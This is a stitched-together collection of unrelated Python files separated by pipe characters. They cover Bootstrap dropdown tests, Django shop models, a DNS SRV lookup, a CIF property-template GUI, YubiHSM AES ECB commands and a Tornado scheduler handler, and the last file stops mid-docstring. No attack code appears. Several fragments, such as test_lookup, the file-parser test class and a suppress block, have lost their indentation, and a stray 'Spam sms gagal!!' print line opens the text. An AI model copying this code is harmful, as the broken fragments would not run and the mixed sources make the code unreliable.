print("Spam sms gagal!!") |
def test_example():
    """Placeholder test; intentionally asserts nothing."""
|
from markyp_html.inline import a
from markyp_bootstrap4.buttons import ButtonContext
from markyp_bootstrap4.dropdowns import *
def test_DropdownButtonFactory():
    """The factory renders toggle buttons for every button context."""
    factory = DropdownButtonFactory()
    assert factory.create_element().markup == '<button ></button>'
    for context in (
        ButtonContext.PRIMARY, ButtonContext.SECONDARY, ButtonContext.SUCCESS,
        ButtonContext.DANGER, ButtonContext.WARNING, ButtonContext.INFO,
        ButtonContext.LIGHT, ButtonContext.DARK, ButtonContext.LINK,
    ):
        css = factory.get_css_class(context)
        empty = f'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-{context} dropdown-toggle"></button>'
        with_value = f'<button type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="btn btn-{context} dropdown-toggle">Value</button>'
        assert factory.create_element(class_=css, **factory.update_attributes({})).markup == empty
        assert factory.create_element("Value", class_=css, **factory.update_attributes({})).markup == with_value
def test_dropdown_button():
    """Exercise every contextual dropdown-button helper, solid and outline,
    with and without a user class / extra attribute.

    Replaces 72 lines of copy-pasted asserts with a data-driven loop over
    the context names; the expected markup is identical.
    """
    names = ('primary', 'secondary', 'success', 'danger', 'warning', 'info', 'light', 'dark', 'link')
    for name in names:
        # (helper attribute, css style fragment) for the solid and outline variants
        for method, style in ((name, name), (f'{name}_outline', f'outline-{name}')):
            create = getattr(dropdown_button, method)
            assert create("Value").markup == (
                f'<button type="button" data-toggle="dropdown" aria-haspopup="true" '
                f'aria-expanded="false" class="btn btn-{style} dropdown-toggle">Value</button>'
            )
            assert create("Value", class_="my-btn", attr=42).markup == (
                f'<button attr="42" type="button" data-toggle="dropdown" aria-haspopup="true" '
                f'aria-expanded="false" class="btn btn-{style} dropdown-toggle my-btn">Value</button>'
            )
def test_menu_header():
    """Every heading helper (h1-h6) and the paragraph helper must render
    with the dropdown-header class; extra class/attributes must merge in.

    Replaces 14 near-identical asserts with one loop over the tag names.
    """
    for tag in ('h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'p'):
        make = getattr(menu_header, tag)
        assert make("Value").markup == f'<{tag} class="dropdown-header">Value</{tag}>'
        assert make("Value", class_="my-header", attr=42).markup == \
            f'<{tag} attr="42" class="dropdown-header my-header">Value</{tag}>'
def test_dropdown():
    """Empty and populated dropdown containers render a div.dropdown."""
    empty = dropdown()
    assert empty.markup == '<div class="dropdown"></div>'
    populated = dropdown("First", "Second", class_="my-dd", attr=42)
    assert populated.markup == '<div attr="42" class="dropdown my-dd">\nFirst\nSecond\n</div>'
def test_menu():
    """Menus are labelled by their toggle button's id via aria-labelledby."""
    empty = menu(button_id="button1")
    assert empty.markup == '<div aria-labelledby="button1" class="dropdown-menu"></div>'
    populated = menu("First", "Second", button_id="button1", class_="my-menu", attr=42)
    assert populated.markup == '<div attr="42" aria-labelledby="button1" class="dropdown-menu my-menu">\nFirst\nSecond\n</div>'
def test_menu_divider():
    """Dividers render a div.dropdown-divider, merging extra class/attrs."""
    plain = menu_divider()
    assert plain.markup == '<div class="dropdown-divider"></div>'
    customized = menu_divider(class_="my-divider", attr=42)
    assert customized.markup == '<div attr="42" class="dropdown-divider my-divider"></div>'
def test_menu_item():
    """Menu items render as buttons (or via a custom factory) and pick up
    the active/disabled state classes in a fixed order."""
    assert menu_item().markup == '<button type="button" class="dropdown-item"></button>'
    assert menu_item("Label").markup == '<button type="button" class="dropdown-item">Label</button>'
    assert menu_item("Label", class_="my-item").markup == '<button type="button" class="dropdown-item my-item">Label</button>'
    # State classes: active comes before disabled, both before the user class.
    assert menu_item("Label", active=True, class_="my-item").markup == '<button type="button" class="dropdown-item active my-item">Label</button>'
    assert menu_item("Label", class_="my-item", disabled=True).markup == '<button type="button" class="dropdown-item disabled my-item">Label</button>'
    assert menu_item("Label", active=True, class_="my-item", disabled=True).markup == '<button type="button" class="dropdown-item active disabled my-item">Label</button>'
    assert menu_item("Label", active=True, class_="my-item", attr=42).markup == '<button type="button" attr="42" class="dropdown-item active my-item">Label</button>'
    # A custom element factory swaps the tag but keeps everything else.
    assert menu_item("Label", active=True, class_="my-item", attr=42, factory=a).markup == '<a type="button" attr="42" class="dropdown-item active my-item">Label</a>'
|
from django.db import models
from django.contrib.auth.models import AbstractUser
from utils.BaseModel import BaseModel
class User(AbstractUser, BaseModel):
    """
    User model, extending Django's AbstractUser with an avatar image.
    """
    # Avatar; uploaded files are stored under MEDIA_ROOT/user_image.
    image = models.ImageField(upload_to="user_image", verbose_name="用户头像")
    class Meta:
        db_table = "shop_user"
        verbose_name = "用户"
        verbose_name_plural = verbose_name
class Address(BaseModel):
    """
    Shipping address model; each address belongs to one user.
    """
    user = models.ForeignKey('User', on_delete=models.CASCADE, verbose_name="所属账户")  # CASCADE: deleting the user also deletes their addresses
    receiver = models.CharField(max_length=20, verbose_name="收件人")
    phone = models.CharField(max_length=11, verbose_name="手机号码")
    addr = models.CharField(max_length=30, verbose_name="收件地址")
    zip_code = models.CharField(max_length=6, default="000000", verbose_name="邮编")
    is_default = models.BooleanField(default=False, verbose_name="是否默认")
    class Meta:
        db_table = "shop_address"
        verbose_name = "地址"
        verbose_name_plural = verbose_name
    def __str__(self):
        # Display the street address as the object's label.
        return self.addr
|
import dns.resolver
import json
def test_lookup(request):
svc = request.args.get('svc')
if svc:
return lookup(svc)
return 'svc arg not provided'
def lookup(name):
    """
    Resolve the SRV record ``_run._tcp.<name>.svc.local.`` for a service.

    Returns a "host: ... port: ..." string built from the first answer, or
    None when the query returns no answers.
    """
    # NOTE(review): dns.resolver.query() is deprecated in dnspython >= 2.0 in
    # favour of dns.resolver.resolve() -- confirm the pinned dnspython version
    # before switching.  A failed lookup raises (e.g. NXDOMAIN) rather than
    # returning an empty answer set.
    answers = dns.resolver.query(f'_run._tcp.{name}.svc.local.', 'SRV')
    if answers:
        print(f'found answers {answers} for name: {name}')
        return f'host: {answers[0].target} port: {answers[0].port}'
    else:
        print(f'no answers found for {name}')
        return None
|
from setuptools import setup
# Packaging metadata for the upstream-wpt-sync webhook service; installs a
# console script that starts the Flask-based hook.
setup(
    name='upstream_wpt_webhook',
    version='0.1.0',
    author='The Servo Project Developers',
    url='https://github.com/servo-automation/upstream-wpt-sync-webhook/',
    description='A service that upstreams local changes to web-platform-tests',
    packages=['upstream_wpt_webhook'],
    install_requires=[
        'flask',
        'requests',
    ],
    entry_points={
        'console_scripts': [
            'upstream_wpt_webhook=upstream_wpt_webhook.hook:start',
        ],
    },
    zip_safe=False,
)
|
# -*- coding: utf-8 -*-
"""
create on 2021-01-30 15:41
author @66492
"""
import numpy as np
def accuracy(y_true: np.ndarray, y_hat: np.ndarray):
    """Return the fraction of positions where *y_hat* equals *y_true*.

    Both arrays are flattened first, so any shapes holding the same number
    of elements are accepted.
    """
    flat_true = y_true.reshape(-1)
    flat_hat = y_hat.reshape(-1)
    return np.mean(flat_true == flat_hat)
|
from contextlib import suppress
from pathlib import Path
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QListWidgetItem, QTableWidget, QListWidget, QStackedWidget
from gemmi import cif
from cif.text import retranslate_delimiter, utf8_to_str
from equip_property.tools import read_document_from_cif_file
from gui.custom_classes import MyQPlainTextEdit
from gui.dialogs import cif_file_open_dialog, show_general_warning, cif_file_save_dialog
from tools.misc import predef_prop_templ
from tools.settings import FinalCifSettings
with suppress(ImportError):
from appwindow import AppWindow
class Properties:
    """Manage CIF property templates in the FinalCif GUI: listing, creating,
    editing, importing/exporting them as CIF files, and persisting them via
    FinalCifSettings."""
    def __init__(self, app: 'AppWindow', settings: FinalCifSettings):
        """Wire up the properties page of *app* and populate the template list."""
        self.app = app
        self.settings = settings
        self.signals_and_slots()
        self.app.ui.PropertiesTemplatesStackedWidget.setCurrentIndex(0)
        self.app.ui.PropertiesEditTableWidget.verticalHeader().hide()
        self.store_predefined_templates()
        self.show_properties()
    def signals_and_slots(self) -> None:
        """Connect all property-page buttons and table signals to their handlers."""
        ## properties
        self.app.ui.EditPropertyTemplateButton.clicked.connect(self.edit_property_template)
        self.app.ui.SavePropertiesButton.clicked.connect(self.save_property_template)
        self.app.ui.CancelPropertiesButton.clicked.connect(self.cancel_property_template)
        self.app.ui.DeletePropertiesButton.clicked.connect(self.delete_property)
        ## properties
        # Every interaction with the edit table may consume the last empty row,
        # so each signal re-checks whether a new blank row is needed:
        self.app.ui.PropertiesEditTableWidget.itemSelectionChanged.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.cellPressed.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.itemEntered.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.cellChanged.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.currentItemChanged.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.itemActivated.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.itemPressed.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.itemClicked.connect(self.add_property_row_if_needed)
        self.app.ui.PropertiesEditTableWidget.itemChanged.connect(self.add_property_row_if_needed)
        self.app.ui.NewPropertyTemplateButton.clicked.connect(self.new_property)
        self.app.ui.ImportPropertyTemplateButton.clicked.connect(self.import_property_from_file)
        self.app.ui.ExportPropertyButton.clicked.connect(self.export_property_template)
    def show_properties(self) -> None:
        """
        Display saved items in the properties lists.
        """
        self.app.ui.PropertiesTemplatesListWidget.clear()
        property_list = self.settings.get_properties_list()
        for pr in property_list:
            if pr:
                item = QListWidgetItem(pr)
                self.app.ui.PropertiesTemplatesListWidget.addItem(item)
    def new_property(self) -> None:
        """Append an empty, editable list entry and start in-place editing."""
        item = QListWidgetItem('')
        self.app.ui.PropertiesTemplatesListWidget.addItem(item)
        self.app.ui.PropertiesTemplatesListWidget.setCurrentItem(item)
        item.setFlags(Qt.ItemIsEditable | Qt.ItemIsEnabled | Qt.ItemIsSelectable)
        self.app.ui.PropertiesTemplatesListWidget.editItem(item)
        self.app.ui.cifKeywordLineEdit.clear()
    def add_property_row_if_needed(self) -> None:
        """
        Adds an empty row at the bottom of either the PropertiesEditTableWidget.
        """
        table = self.app.ui.PropertiesEditTableWidget
        rowcount = table.rowCount()
        cont = 0
        for row in range(rowcount):
            key = ''
            # A cell may hold either a plain item or a widget; try both.
            with suppress(AttributeError, TypeError):
                key = table.item(row, 0).text()
            with suppress(AttributeError, TypeError):
                key = table.cellWidget(row, 0).getText()
            if key:  # don't count empty key rows
                cont += 1
        diff = rowcount - cont
        # Keep at least four trailing empty rows available for editing.
        if diff < 4:
            table.insertRow(rowcount)
    # The properties templates:
    def delete_property(self) -> None:
        """Delete the currently selected property template from settings and UI."""
        # First delete the list entries
        index = self.app.ui.PropertiesTemplatesListWidget.currentIndex()
        property_name = index.data()
        self.settings.delete_template('property', property_name)
        # now make it invisible:
        self.app.ui.PropertiesTemplatesListWidget.takeItem(index.row())
        self.cancel_property_template()
        # I do these both to clear the list:
        self.store_predefined_templates()
        self.show_properties()
    def edit_property_template(self) -> None:
        """
        Edit the Property table.
        """
        # make sure the current item doesn't get lost:
        it = self.app.ui.PropertiesTemplatesListWidget.currentItem()
        self.app.ui.PropertiesTemplatesListWidget.setCurrentItem(None)
        self.app.ui.PropertiesTemplatesListWidget.setCurrentItem(it)
        self.app.ui.CancelEquipmentButton.click()
        self.load_property_from_settings()
    def save_property_template(self) -> None:
        """Persist the currently edited template and refresh dependent widgets."""
        table = self.app.ui.PropertiesEditTableWidget
        stackedwidget = self.app.ui.PropertiesTemplatesStackedWidget
        listwidget = self.app.ui.PropertiesTemplatesListWidget
        keyword = self.app.ui.cifKeywordLineEdit.text()
        self.save_property(table, stackedwidget, listwidget, keyword)
        self.app.refresh_combo_boxes()
    def store_predefined_templates(self) -> None:
        """Ensure all built-in property templates exist in the settings store."""
        property_list = self.settings.get_properties_list() or []
        for item in predef_prop_templ:
            if not item['name'] in property_list:
                self.settings.save_settings_list('property', item['name'], item['values'])
    def export_property_template(self, filename: str = '') -> None:
        """
        Exports the currently selected property entry to a file.
        """
        selected_row_text = self.app.ui.PropertiesTemplatesListWidget.currentIndex().data()
        if not selected_row_text:
            return
        prop_data = self.settings.load_settings_list('property', selected_row_text)
        table_data = []
        cif_key = ''
        # Stored format is [cif_key, value_list]; older entries may lack values.
        if prop_data:
            cif_key = prop_data[0]
            with suppress(Exception):
                table_data = prop_data[1]
        if not cif_key:
            return
        doc = cif.Document()
        blockname = '__'.join(selected_row_text.split())
        block = doc.add_new_block(blockname)
        try:
            loop = block.init_loop(cif_key, [''])
        except RuntimeError:
            # Not a valid loop key
            show_general_warning('"{}" is not a valid cif keyword.'.format(cif_key))
            return
        for value in table_data:
            if value:
                loop.add_row([cif.quote(utf8_to_str(value))])
        if not filename:
            filename = cif_file_save_dialog(blockname.replace('__', '_') + '.cif')
        if not filename.strip():
            return
        try:
            doc.write_file(filename, style=cif.Style.Indent35)
            # Path(filename).write_text(doc.as_string(cif.Style.Indent35))
        except PermissionError:
            if Path(filename).is_dir():
                return
            show_general_warning('No permission to write file to {}'.format(Path(filename).resolve()))
    def import_property_from_file(self, filename: str = '') -> None:
        """
        Imports a cif file as entry of the property templates list.
        """
        if not filename:
            filename = cif_file_open_dialog(filter="CIF file (*.cif)")
        if not filename:
            return
        doc = read_document_from_cif_file(filename)
        if not doc:
            return
        property_list = self.settings.settings.value('property_list')
        if not property_list:
            property_list = ['']
        block = doc.sole_block()
        template_list = []
        loop_column_name = ''
        # Collect all loop values; only the first loop tag is kept as the key.
        for i in block:
            if i.loop is not None:
                if len(i.loop.tags) > 0:
                    loop_column_name = i.loop.tags[0]
                for n in range(i.loop.length()):
                    value = i.loop.val(n, 0)
                    template_list.append(retranslate_delimiter(cif.as_string(value).strip("\n\r ;")))
        block_name = block.name.replace('__', ' ')
        # This is the list shown in the Main menu:
        property_list.append(block_name)
        table = self.app.ui.PropertiesEditTableWidget
        table.setRowCount(0)
        self.app.ui.cifKeywordLineEdit.setText(loop_column_name)
        newlist = [x for x in list(set(property_list)) if x]
        newlist.sort()
        # this list keeps track of the property items:
        self.settings.save_template_list('property_list', newlist)
        template_list.insert(0, '')
        template_list = list(set(template_list))
        # save as dictionary for properties to have "_cif_key : itemlist"
        # for a table item as dropdown menu in the main table.
        table_data = [loop_column_name, template_list]
        self.settings.save_template_list('property/' + block_name, table_data)
        self.show_properties()
    def load_property_from_settings(self) -> None:
        """
        Load/Edit the value list of a property entry.
        """
        table = self.app.ui.PropertiesEditTableWidget
        listwidget = self.app.ui.PropertiesTemplatesListWidget
        # Block signals so programmatic row insertion does not retrigger
        # add_property_row_if_needed for every cell.
        table.blockSignals(True)
        table.clearContents()
        table.setRowCount(0)
        index = listwidget.currentIndex()
        if index.row() == -1:
            # nothing selected
            # self.app.ui.PropertiesEditTableWidget.blockSignals(False)
            return
        selected_row_text = listwidget.currentIndex().data()
        table_data = self.settings.load_settings_list('property', selected_row_text)
        if table_data:
            cif_key = table_data[0]
            with suppress(Exception):
                table_data = table_data[1]
            self.app.ui.cifKeywordLineEdit.setText(cif_key)
        if not table_data:
            table_data = ['', '', '']
        for value in table_data:
            try:
                self.add_propeties_row(table, retranslate_delimiter(str(value)))
            except TypeError:
                print('Bad value in property table')
                continue
        self.add_propeties_row(table, '')
        self.app.ui.PropertiesTemplatesStackedWidget.setCurrentIndex(1)
        table.blockSignals(False)
        # table.setWordWrap(False)
        table.resizeRowsToContents()
    @staticmethod
    def add_propeties_row(table: QTableWidget, value: str = '') -> None:
        """
        Add a new row with a value to the Property table.
        (Name keeps the historical "propeties" spelling for compatibility.)
        """
        # Create a empty row at bottom of table
        row_num = table.rowCount()
        table.insertRow(row_num)
        # Add cif key and value to the row:
        # item_val = MyTableWidgetItem(value)
        # table.setItem(row_num, 0, item_val)
        key_item = MyQPlainTextEdit(parent=table, minheight=50)
        key_item.row = row_num
        key_item.setPlainText(value)
        ## This is critical, because otherwise the add_row_if_needed does not work as expected:
        # key_item.textChanged.connect(self.add_row_if_needed)
        table.setCellWidget(row_num, 0, key_item)
    def save_property(self, table: QTableWidget,
                      stackwidget: QStackedWidget,
                      listwidget: QListWidget,
                      keyword: str = '') -> None:
        """
        Saves the currently selected Property template to the config file.
        """
        # Set None Item to prevent loss of the currently edited item:
        # The current item is closed and thus saved.
        table.setCurrentItem(None)
        selected_template_text = listwidget.currentIndex().data()
        table_data = []
        ncolumns = table.rowCount()
        for rownum in range(ncolumns):
            try:
                # only one column!
                value = table.cellWidget(rownum, 0).getText()
            except AttributeError:
                value = ''
            if value:
                table_data.append(value)
        # make sure to have always a blank item first:
        table_data.insert(0, '')
        if keyword:
            # save as dictionary for properties to have "_cif_key : itemlist"
            # for a table item as dropdown menu in the main table.
            table_data = [keyword, table_data]
        self.settings.save_template_list('property/' + selected_template_text, table_data)
        stackwidget.setCurrentIndex(0)
        print('saved')
    def cancel_property_template(self) -> None:
        """
        Cancel editing of the current template.
        """
        table = self.app.ui.PropertiesEditTableWidget
        table.clearContents()
        table.setRowCount(0)
        self.app.ui.PropertiesTemplatesStackedWidget.setCurrentIndex(0)
|
import unittest
from logging import INFO
from common import exceptions
import logger
from series import FileParser
class KnownValues(unittest.TestCase):
    """Shared fixture describing a parsed SxxExx episode file.

    Other test classes mutate ``File_SxxExx['FileName']`` per test case.
    """
    File_SxxExx = {
        'FileName': "",
        'SeriesName': 'Covert Affairs',
        'SeasonNum': 1,
        'EpisodeNums': [1],
        'type': 'episode',
        'Ext': 'ext',
    }
class FileParserExceptions(unittest.TestCase):
def setUp(self):
TRACE = 5
VERBOSE = 15
logger.initialize(unit_test=True, level=INFO)
# logger.start(level=ERROR)
self.library = FileParser()
def test_FileParser_exception_case_001(self):
# should raise an exception for missing or invalid patient_id
KnownValues.File_SxxExx['FileName'] = '/mnt/Download/Bittorrent/the.big.bang.theory.season.1.avi'
self.assertRaises(exceptions.InvalidFilename, self.library.getFileDetails, KnownValues.File_SxxExx['FileName'])
def theSuite(self):
suite = unittest.TestLoader().loadTestsFromTestCase(self)
return suite
if __name__ == '__main__':
    # Build this module's exception-test suite and run it verbosely.
    suite = FileParserExceptions.theSuite()
    unittest.TextTestRunner(verbosity=2).run(suite)
|
import click
from cached_property import cached_property
from sgqlc.endpoint.http import HTTPEndpoint
from github_team_organizer.classes.github import GitHubWrapper
class GitHubGraphQL:
    """Singleton wrapper around the GitHub GraphQL API endpoint.

    Credentials come from GitHubWrapper(); queries are executed through an
    sgqlc HTTPEndpoint.
    """
    __instance = None
    url = 'https://api.github.com/graphql'
    def __new__(cls, *args, **kwargs):
        # Classic singleton: create the one instance lazily and reuse it.
        # BUG FIX: do not forward *args/**kwargs to object.__new__() -- it
        # raises TypeError for any extra arguments when __init__ is not
        # overridden, so any constructor argument used to crash.
        if GitHubGraphQL.__instance is None:
            GitHubGraphQL.__instance = super().__new__(cls)
        return GitHubGraphQL.__instance
    @cached_property
    def headers(self):
        """Authorization headers built from the configured GitHub token."""
        return {
            'Authorization': f'bearer {GitHubWrapper().login_or_token}',
        }
    @cached_property
    def endpoint(self):
        """Lazily constructed HTTP endpoint for the GraphQL API."""
        return HTTPEndpoint(self.url, self.headers)
    def call(self, *args, **kwargs):
        """Execute a GraphQL query; abort the process if the response
        contains any GraphQL errors.

        :return: the decoded JSON response on success.
        """
        result = self.endpoint(*args, **kwargs)
        if result.get('errors'):
            # Typo fixed in the message ("occured" -> "occurred");
            # SystemExit replaces the site-dependent exit() builtin.
            click.secho(f'Error occurred: {result}', bg='yellow')
            raise SystemExit(1)
        return result
|
"""
implementations of AES ECB block cipher commands to execute on a YubiHSM
"""
# Copyright (c) 2011 Yubico AB
# See the file COPYING for licence statement.
import struct
__all__ = [
    # constants
    # functions
    # classes
    # NOTE: the common base class is intentionally not exported:
    #'YHSM_Cmd_AES_ECB',
    'YHSM_Cmd_AES_ECB_Encrypt',
    'YHSM_Cmd_AES_ECB_Decrypt',
    'YHSM_Cmd_AES_ECB_Compare',
]
import pyhsm.defines
import pyhsm.exception
from pyhsm.cmd import YHSM_Cmd
class YHSM_Cmd_AES_ECB(YHSM_Cmd):
    """ Common code for command classes in this module. """
    # Last status byte returned by the device (None until parse_result ran).
    status = None
    # Key handle used in the request; subclasses set this before sending.
    key_handle = 0x00
    def __init__(self, stick, command, payload):
        YHSM_Cmd.__init__(self, stick, command, payload)
    def __repr__(self):
        return '<%s instance at %s: key_handle=0x%x>' % (
            self.__class__.__name__,
            hex(id(self)),
            self.key_handle
        )
    def parse_result(self, data):
        """Unpack an encrypt/decrypt response; return the result block on
        success, raise YHSM_CommandFailed otherwise.

        NOTE(review): pyhsm.util is used here but only pyhsm.defines and
        pyhsm.exception are imported at the top of this file -- presumably
        pyhsm's package __init__ loads util; confirm.
        """
        # typedef struct {
        #   uint32_t keyHandle;                  // Key handle
        #   uint8_t ciphertext[YSM_BLOCK_SIZE];  // Ciphertext block
        #   YHSM_STATUS status;                  // Encryption status
        # } YHSM_ECB_BLOCK_ENCRYPT_RESP;
        # OR
        # typedef struct {
        #   uint32_t keyHandle;                  // Key handle
        #   uint8_t plaintext[YSM_BLOCK_SIZE];   // Plaintext block
        #   YHSM_STATUS status;                  // Decryption status
        # } YHSM_ECB_BLOCK_DECRYPT_RESP;
        fmt = "< I %is B" % (pyhsm.defines.YSM_BLOCK_SIZE)
        key_handle, \
            result, \
            self.status = struct.unpack(fmt, data)
        # check that returned key_handle matches the one in the request
        pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
        if self.status == pyhsm.defines.YSM_STATUS_OK:
            return result
        else:
            raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status)
class YHSM_Cmd_AES_ECB_Encrypt(YHSM_Cmd_AES_ECB):
    """
    Have the YubiHSM AES ECB encrypt something using the key of a key handle.
    """
    def __init__(self, stick, key_handle, plaintext):
        # Plaintext may be shorter than a block; it is zero-padded below.
        pyhsm.util.input_validate_str(plaintext, name='plaintext', max_len = pyhsm.defines.YSM_BLOCK_SIZE)
        self.key_handle = pyhsm.util.input_validate_key_handle(key_handle)
        # typedef struct {
        #   uint32_t keyHandle;                 // Key handle
        #   uint8_t plaintext[YHSM_BLOCK_SIZE]; // Plaintext block
        # } YHSM_ECB_BLOCK_ENCRYPT_REQ;
        payload = struct.pack('<I', key_handle) + \
            plaintext.ljust(pyhsm.defines.YSM_BLOCK_SIZE, chr(0x0))
        YHSM_Cmd_AES_ECB.__init__(self, stick, pyhsm.defines.YSM_AES_ECB_BLOCK_ENCRYPT, payload)
class YHSM_Cmd_AES_ECB_Decrypt(YHSM_Cmd_AES_ECB):
    """
    Have the YubiHSM AES ECB decrypt something using the key of a key handle.
    """
    def __init__(self, stick, key_handle, ciphertext):
        self.key_handle = pyhsm.util.input_validate_key_handle(key_handle)
        # Ciphertext must be exactly one block (no padding on decrypt).
        pyhsm.util.input_validate_str(ciphertext, name='ciphertext', exact_len = pyhsm.defines.YSM_BLOCK_SIZE)
        # #define YHSM_BLOCK_SIZE 16 // Size of block operations
        # typedef struct {
        #   uint32_t keyHandle;                  // Key handle
        #   uint8_t ciphertext[YHSM_BLOCK_SIZE]; // Ciphertext block
        # } YHSM_ECB_BLOCK_DECRYPT_REQ;
        fmt = "< I %is" % (pyhsm.defines.YSM_BLOCK_SIZE)
        payload = struct.pack(fmt, key_handle, ciphertext)
        YHSM_Cmd_AES_ECB.__init__(self, stick, pyhsm.defines.YSM_AES_ECB_BLOCK_DECRYPT, payload)
class YHSM_Cmd_AES_ECB_Compare(YHSM_Cmd_AES_ECB):
    """
    Have the YubiHSM AES ECB decrypt something using the key of a key handle, and
    then compare it with a plaintext we supply.
    Requires you to know the plaintext to verify if the ciphertext matches it,
    providing added security in some applications.
    """
    def __init__(self, stick, key_handle, ciphertext, plaintext):
        self.key_handle = pyhsm.util.input_validate_key_handle(key_handle)
        pyhsm.util.input_validate_str(ciphertext, name='ciphertext')
        pyhsm.util.input_validate_str(plaintext, name='plaintext')
        # #define YHSM_BLOCK_SIZE 16 // Size of block operations
        # typedef struct {
        #   uint32_t keyHandle;                  // Key handle
        #   uint8_t ciphertext[YHSM_BLOCK_SIZE]; // Ciphertext block
        #   uint8_t plaintext[YHSM_BLOCK_SIZE];  // Plaintext block
        # } YHSM_ECB_BLOCK_DECRYPT_CMP_REQ;
        fmt = "< I %is %is" % (pyhsm.defines.YSM_BLOCK_SIZE, pyhsm.defines.YSM_BLOCK_SIZE)
        payload = struct.pack(fmt, key_handle, ciphertext, plaintext)
        YHSM_Cmd_AES_ECB.__init__(self, stick, pyhsm.defines.YSM_AES_ECB_BLOCK_DECRYPT_CMP, payload)
    def parse_result(self, data):
        """Return True on match, False on mismatch; raise on any other status."""
        # #define YHSM_BLOCK_SIZE 16 // Size of block operations
        # typedef struct {
        #   uint32_t keyHandle;   // Key handle
        #   YHSM_STATUS status;   // Decryption + verification status
        # } YHSM_ECB_BLOCK_VERIFY_RESP;
        fmt = "< I B"
        key_handle, \
            self.status = struct.unpack(fmt, data)
        # check that returned key_handle matches the one in the request
        pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle)
        if self.status == pyhsm.defines.YSM_STATUS_OK:
            return True
        # NOTE: the else below binds to this second if, so any status other
        # than OK or MISMATCH raises.
        if self.status == pyhsm.defines.YSM_MISMATCH:
            return False
        else:
            raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status)
|
"""Handler for executions endpoint."""
from datetime import datetime
from datetime import timedelta
import tornado.gen
import tornado.web
from ndscheduler import settings
from ndscheduler.corescheduler import constants
from ndscheduler.corescheduler import utils
from ndscheduler.server.handlers import base
class Handler(base.BaseHandler):
    """Tornado handler for the /api/v1/executions endpoints.

    Blocking datastore work is done in ``_``-prefixed methods which are run
    on a threaded executor via ``run_on_executor`` wrappers.

    NOTE(review): ``tornado.concurrent`` is referenced below but only
    ``tornado.gen`` and ``tornado.web`` are imported at the top of this
    chunk -- presumably ``tornado.web`` loads it transitively; confirm.
    """
    def _get_execution(self, execution_id):
        """Returns a dictionary of a job execution info.
        This is a blocking operation.
        :param str execution_id: Execution id.
        :return: If success, a dictionary of a job execution info; otherwise, a dictionary
            of error message.
        :rtype: dict
        """
        execution = self.datastore.get_execution(execution_id)
        if not execution:
            self.set_status(400)
            return {"error": "Execution not found: %s" % execution_id}
        return execution
    @tornado.concurrent.run_on_executor
    def get_execution(self, execution_id):
        """Wrapper for _get_execution() to run on threaded executor.
        :param str execution_id: Execution id.
        :return: Job execution info.
        :rtype: str
        """
        return self._get_execution(execution_id)
    # @tornado.gen.coroutine
    # def get_execution_yield(self, execution_id):
    #     """Wrapper for get_execution to run in async mode
    #     :param str execution_id: Execution id.
    #     """
    #     return_json = yield self.get_execution(execution_id)
    #     self.finish(return_json)
    def _get_executions(self):
        """Returns a dictionary of executions in a specific time range.
        This is a blocking operation.
        :return: executions info.
        :rtype: dict
        """
        now = datetime.utcnow()
        # Defaults: the last 10 minutes, ending now.
        time_range_end = self.get_argument("time_range_end", now.isoformat())
        ten_minutes_ago = now - timedelta(minutes=10)
        time_range_start = self.get_argument("time_range_start", ten_minutes_ago.isoformat())
        executions = self.datastore.get_executions(time_range_start, time_range_end)
        return executions
    @tornado.concurrent.run_on_executor
    def get_executions(self):
        """Wrapper for _get_executions to run on threaded executor.
        :return: executions info.
        :rtype: dict
        """
        return self._get_executions()
    @tornado.web.authenticated
    @tornado.web.removeslash
    @tornado.gen.coroutine
    def get(self, execution_id=None):
        """Returns a execution or multiple executions.
        Handles two endpoints:
            GET /api/v1/executions                 (when execution_id == None)
                It takes two query string parameters:
                - time_range_end - unix epoch timestamp. Default: now
                - time_range_start - unix epoch timestamp. Default: 10 minutes ago.
                These two parameters limit the executions to return:
                    time_range_start <= execution.scheduled_time <= time_range_end
            GET /api/v1/executions/{execution_id}  (when execution_id != None)
        :param str execution_id: Execution id.
        """
        if execution_id is None:
            # self.get_executions_yield()
            return_json = yield self.get_executions()
        else:
            # self.get_execution_yield(execution_id)
            return_json = yield self.get_execution(execution_id)
        self.finish(return_json)
    def _run_job(self, job_id):
        """Kicks off a job.
        This is a blocking operation.
        :param str job_id: Job id.
        :return: A dictionary with the only field of execution_id.
        :rtype: dict
        """
        job = self.scheduler_manager.get_job(job_id)
        if not job:
            self.set_status(400)
            return {"error": "Job not found: %s" % job_id}
        job_name = utils.get_job_name(job)
        args = utils.get_job_args(job)
        kwargs = job.kwargs
        # Scheduler class is resolved from settings so deployments can swap it.
        scheduler = utils.import_from_path(settings.SCHEDULER_CLASS)
        execution_id = scheduler.run_job(
            job_name,
            job_id,
            settings.DATABASE_CLASS,
            self.datastore.db_config,
            self.datastore.table_names,
            *args,
            **kwargs
        )
        # Audit log
        self.datastore.add_audit_log(
            job_id, job.name, constants.AUDIT_LOG_CUSTOM_RUN, user=self.username, description=execution_id,
        )
        response = {"execution_id": execution_id}
        return response
    @tornado.concurrent.run_on_executor
    def run_job(self, job_id):
        """Wrapper for _run_job() to run on threaded executor.
        :param str job_id: String for a job id.
        :return: A dictionary with the only field of execution_id.
        :rtype: dict
        """
        return self._run_job(job_id)
    @tornado.web.authenticated
    @tornado.web.removeslash
    @tornado.gen.coroutine
    def post(self, job_id):
        """Runs a job.
        Handles an endpoint:
            POST /api/v1/executions
        Args:
            job_id: String for job id.
        """
        return_json = yield self.run_job(job_id)
        self.finish(return_json)
    @tornado.web.authenticated
    @tornado.web.removeslash
    def delete(self, job_id):
        """Stops a job execution.
        Handles an endpoint (presumably DELETE /api/v1/executions/{job_id};
